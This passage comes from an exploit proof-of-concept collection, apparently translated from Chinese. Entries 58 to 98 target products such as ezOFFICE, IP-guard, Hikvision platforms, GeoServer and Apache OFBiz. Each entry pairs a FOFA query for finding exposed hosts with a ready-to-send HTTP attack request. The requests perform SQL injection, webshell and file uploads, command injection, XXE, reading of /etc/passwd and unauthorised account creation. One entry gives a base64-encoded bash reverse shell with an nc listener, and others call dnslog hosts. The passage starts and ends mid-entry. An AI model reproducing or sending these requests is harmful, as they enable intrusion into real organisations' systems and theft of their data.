User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm that the vulnerability exists.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
    <params>
      <param>
      <value>
        <struct>
       <member>
          <name>test</name>
          <value>
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
          </value>
        </member>
      </struct>
      </value>
    </param>
    </params>
</methodCall>

Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

